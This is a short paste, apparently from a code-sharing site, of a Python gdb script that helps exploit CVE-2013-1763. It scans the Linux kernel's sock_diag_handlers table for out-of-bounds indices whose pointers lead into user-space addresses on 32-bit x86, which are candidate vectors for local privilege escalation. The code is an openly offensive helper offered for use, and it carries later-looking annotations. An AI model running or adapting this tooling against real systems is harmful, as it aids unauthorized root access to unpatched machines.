oceanx

Automatic vector finder for CVE-2013-1763

May 14th, 2013
  1. '''
  2. Automatic vector finder for CVE-2013-1763
  3.  
  4. Run inside gdb and pass find_location() the address of sock_diag_handlers as base ( a count of 256 is fine )
  5.  
  6. ocean  ### https://twitter.com/_ocean
  7. '''
  8.  
  9. import struct
  10. import subprocess
  11. import re
  12. import sys
  13. import os
  14. import gdb
  15.  
  16.  
def find_location(base,count):
    """Scan a table of 32-bit words in the debuggee and report pointer candidates.

    Reads ``count * 4`` bytes starting at ``base`` from the first gdb
    inferior and walks the words at indices 1 .. count-1 (index 0 is not
    examined). Each word is decoded as a little-endian unsigned 32-bit value.

    * A word above 0xBF000000 is dereferenced: the two consecutive words at
      that address are read, and a line is printed when the second of them
      lies in [4096, 0xBF000000).
    * A word that itself lies in [4096, 0xBF000000) is printed as a
      "possible location in uspace".

    Addresses that cannot be read (gdb.MemoryError) are skipped silently.

    Args:
        base: address of the table to scan (the module docstring names
            sock_diag_handlers).
        count: number of 4-byte slots to read from ``base``.

    Returns:
        True when the scan ran to completion, False when any other exception
        was raised (the exception is printed first).
    """
    # NOTE(review): the 4-byte slot width and the 0xBF000000 boundary look
    # like a 32-bit x86 user/kernel split -- confirm before relying on the
    # output for any other layout.
    # NOTE(review): 4096 is hard-coded; the running kernel's actual
    # vm.mmap_min_addr setting is not consulted, so low hits may not be
    # mappable on a hardened system.
    mask = 0xFFFFFFFF  # force every comparison to be unsigned 32-bit
    user_floor = 4096 & mask
    user_ceiling = int("0xBF000000",16) & mask

    def in_user_range(value):
        # True when value falls inside the assumed user-space window.
        return user_floor <= (value & mask) < user_ceiling

    try:
        inferior = gdb.inferiors()[0]
        # Fetch the whole table in one read; slots are decoded from this copy.
        table = inferior.read_memory(base, count*4)

        for index in range(1, count):
            offset = index * 4
            slot_address = base + offset
            raw = struct.unpack('<I', table[offset:offset + 4])[0]

            if (raw & mask) > user_ceiling:
                # Slot points above the boundary: look at what it points to.
                try:
                    first_raw = inferior.read_memory(raw, 4)
                    second_raw = inferior.read_memory(raw + 4, 4)
                except gdb.MemoryError:
                    # Unreadable target address, so not a usable pointer.
                    continue
                first = struct.unpack('<I', first_raw)[0]
                second = struct.unpack('<I', second_raw)[0]
                if in_user_range(second):
                    print("["+hex(index)+"] "+hex(slot_address)+" = "+hex(first)+"\t"+hex(second))
            elif in_user_range(raw):
                print("possible location in uspace ["+hex(index)+"] "+hex(slot_address)+" = "+hex(raw))

        return True
    except Exception as exc:
        # Any failure outside the per-slot reads aborts the scan.
        print(exc)
        return False